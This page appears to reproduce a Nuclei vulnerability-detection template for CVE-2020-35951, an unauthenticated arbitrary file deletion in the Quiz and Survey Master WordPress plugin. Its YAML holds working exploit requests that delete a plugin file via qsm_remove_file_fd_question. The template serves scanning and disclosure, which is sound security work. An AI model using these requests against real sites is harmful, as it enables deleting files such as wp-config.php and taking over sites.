Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion

ID: CVE-2020-35951

Severity: critical

Author: princechaddha

Tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech

Description

Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).

YAML Source

id: CVE-2020-35951

info:
  name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion
  author: princechaddha
  severity: critical
  description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
  impact: |
    This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise.
  remediation: |
    Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35951
    - https://wpscan.com/vulnerability/10348
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
    cvss-score: 9.9
    cve-id: CVE-2020-35951
    cwe-id: CWE-306
    epss-score: 0.00174
    epss-percentile: 0.54591
    cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 4
    vendor: expresstech
    product: quiz_and_survey_master
    framework: wordpress
  tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech

http:
  - raw:
      - |
        GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92


        ------WebKitFormBoundaryBJ17hSJBjuGrnW92
        Content-Disposition: form-data; name="action"

        qsm_remove_file_fd_question
        ------WebKitFormBoundaryBJ17hSJBjuGrnW92
        Content-Disposition: form-data; name="file_url"

        {{fullpath}}wp-content/plugins/quiz-master-next/README.md
        ------WebKitFormBoundaryBJ17hSJBjuGrnW92--
      - |
        GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')

      - type: word
        part: body
        words:
          - '{"type":"success","message":"File removed successfully"}'

    extractors:
      - type: regex
        name: fullpath
        group: 1
        regex:
          - not found in <b>([/a-z_]+)wp
        internal: true
        part: body
# digest: 490a004630440220316b237e707596a35daeefbb1ca451ac6749037722f63fe87949cbf5ae9786450220102154ee2c1b3c8436c99a5d8766a2268a04d91cd2164474722cad55b7583784:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-35951.yaml"

View on Github